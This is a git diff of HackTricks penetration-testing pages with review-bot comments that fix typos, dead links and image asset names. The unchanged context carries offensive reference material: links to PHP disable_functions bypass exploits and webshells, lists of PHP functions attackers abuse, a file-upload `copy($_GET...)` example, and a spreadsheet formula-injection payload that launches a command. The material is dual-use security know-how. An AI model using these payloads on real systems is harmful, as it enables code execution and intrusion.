@ -591,10 +590,16 @@ Maybe using **PHP** to **enumerate** the box you can find a way to escalate priv
I have created a webshell that makes very easy to perform this actions (note that most webshells will offer you this options also): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
## Modules/Version dependent bypasses
### Modules/Version dependent bypasses
There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version:
* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
* [**Bypass with FFI - Foreign Function Interface enabled**](broken-reference)****
* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
* [**dl function**](disable\_functions-bypass-dl-function.md)****
* [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)
* 5.\* - exploitable with minor changes to the PoC
* 7.0 - all versions to date
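Review bot: the new `Bypass with FFI - Foreign Function Interface enabled` entry links to `broken-reference`, which is not a page; either restore the real target (the FFI bypass page) or leave the entry out until it exists, otherwise readers get a dead link in the list. The same entry and the `dl function` entry also end with a stray `****` after the link; drop it.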
@ -604,28 +609,24 @@ There are several ways to bypass disable\_functions if some specific module is b
* 7.4 - all versions to date
* 8.0 - all versions to date
* [**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)
* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)
* **dl function**
* [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)
* [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)
* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)
* [**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md)
* [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)
* [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)
* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
* [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)
* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)
* [**Bypass via mem**](disable\_functions-bypass-via-mem.md)
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
* [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)
## **ALL IN ONE**
### **Automatic Tool**
The code with more options mentioned here available I have found is [https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
The following script tries some of the methods commented here:\
[https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
# Other Interesting PHP functions
## Other Interesting PHP functions
## List of functions which accept callbacks
### List of functions which accept callbacks
These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.\
Function => Position of callback arguments\
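Review bot: several link texts in the re-ordered list disagree with their target slugs and read as typos, so fix them while this hunk already rewrites the list: `PHP 7.0=7.4 (\*nix)` should be `7.0-7.4` (target `disable\_functions-bypass-php-7.0-7.4-nix-only.md`), `PHP 5.x Shellsock` should be `Shellshock` (target `...5.x-shellshock-exploit.md`), `PHP 4 >= 4.2.-` should be `4.2.0` (target `...php-4-greater-than-4.2.0...`), and `PHP 5.2.3 -Win32std` has a misplaced hyphen. The bare `**dl function**` bullet is also the only entry without a link; if it is meant to stay in this list it should link to `disable\_functions-bypass-dl-function.md` like the copy in the new "Modules/Version dependent bypasses" section.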
@ -662,7 +663,7 @@ Function => Position of callback arguments\
'sqlite\_create\_aggregate' => array(2, 3),\
'sqlite\_create\_function' => 2,
## Information Disclosure
### Information Disclosure
Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.\
**phpinfo**\
@ -683,7 +684,7 @@ Most of these function calls are not sinks. But rather it maybe a vulnerability
**getmypid**\
**getmyuid**
## Other
### Other
**extract** - Opens the door for register\_globals attacks (see study in scarlet).\
**parse\_str** - works like extract if only one argument is given.\
@ -703,7 +704,7 @@ putenv\
**posix\_setsid**\
**posix\_setuid**
## Filesystem Functions
### Filesystem Functions
According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
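Review bot: the context paragraph under the retitled `### Filesystem Functions` heading carries typos worth fixing in the same pass: `a request send via GET` should read `sent`, `everyone of those file system functions` should be `every one of those`, and `channel and attack to another host` should be `channel an attack`. `allow\_url\_fopen=On` and the `copy($\_GET\['s'], $\_GET\['d']);` call would also read better in backticks so the escaped underscores and brackets stop fighting the markdown.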
@ -733,7 +734,7 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
**tempnam**\
**touch**\
**unlink**\
**imagepng** - 2nd parameter is a path.\
**imagepng** - 2nd parameter is a path.\
**imagewbmp** - 2nd parameter is a path.\
**image2wbmp** - 2nd parameter is a path.\
**imagejpeg** - 2nd parameter is a path.\
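Review bot: the two `**imagepng** - 2nd parameter is a path.\` lines in this hunk render identically, so the removed and added versions differ only in invisible characters (trailing whitespace or the GitBook line-break marker). Confirm the edit is intentional; a whitespace-only change is easy to drop from a commit that otherwise only demotes headings and renames assets.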
@ -802,7 +803,6 @@ According to RATS all filesystem functions in php are nasty. Some of these don't
**php\_strip\_whitespace**\
**get\_meta\_tags**
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -818,5 +818,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View File

@ -219,7 +219,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall>
```
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>)
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (102).png>)

View File

@ -41,7 +41,7 @@ Electron has 2 process types:
* Main Process (has complete access to NodeJS)
* Renderer Process (should have NodeJS restricted access for security reasons)
![](<../../../.gitbook/assets/image (307) (5).png>)
![](<../../../.gitbook/assets/image (307) (5) (1).png>)
A **renderer process** will be a browser window loading a file:
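Review bot: `image (307) (5).png` becomes `image (307) (5) (1).png` here, while the final hunk of this commit moves the Windows persistence page from `image (307).png` to `image (307) (5).png`. The same numeric family now serves unrelated pages, so verify that this page still shows the Electron process diagram and not the other page's registry screenshot; a swapped picture would not be visible in the text diff.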

View File

@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png" alt="" data-size="original">
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png" alt="" data-size="original">
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
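Review bot: the Intigriti banner `<img>` is updated by hand-inserting `(10)` into its asset path, and the identical edit is repeated with `alt=""` in every other banner hunk of this commit. An empty `alt` on a sponsor banner gives screen readers nothing, so set `alt="Intigriti"` or similar, and since every copy shows the same picture, give it one shared asset name so a single rename does not need an edit per page.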
@ -313,7 +313,7 @@ This helps to upload a file that complins with the format of several different f
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
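Review bot: the hunk header context `This helps to upload a file that complins with the format of several different f` shows a typo (`complies`) directly above the changed banner; worth fixing while this section is being touched.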

View File

@ -59,7 +59,7 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### More

View File

@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png" alt="" data-size="original">
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png" alt="" data-size="original">
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
@ -262,7 +262,7 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999)
{% embed url="https://github.com/ticarpi/jwt_tool" %}
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
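Review bot: the hunk header context `imagine a situation where the maximun length of the ID is 4 (0001-9999)` has a typo (`maximum`) right above the changed banner; fix it in the same pass.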

View File

@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -239,7 +239,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
{% hint style="danger" %}
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

View File

@ -26,7 +26,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
## Attacks Graphic
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>)
## Tool
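Review bot: `(10)` is inserted in the middle of the suffix chain (`... (1) (1) (10) (4).png`) rather than appended at the end, which points to the sync tool re-uploading the file rather than a deliberate rename. Confirm the referenced file exists under `.gitbook/assets` after this commit, because a broken image under `## Attacks Graphic` would pass a text-only review unnoticed.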

View File

@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -173,7 +173,7 @@ SELECT $TAG$hacktricks$TAG$;
```
{% hint style="danger" %}
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
<img src="../../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}

View File

@ -285,7 +285,7 @@ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
```
![](<../../.gitbook/assets/image (307).png>)
![](<../../.gitbook/assets/image (307) (5).png>)
## Powershell
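Review bot: `image (307).png` is replaced by `image (307) (5).png` under the `RunOnce` registry listing, while the Electron hunk earlier in this commit moves off `image (307) (5).png` at the same time, so the file is effectively handed from one page to another. Check that the picture now shown here is the registry/autorun screenshot and not the Electron process diagram.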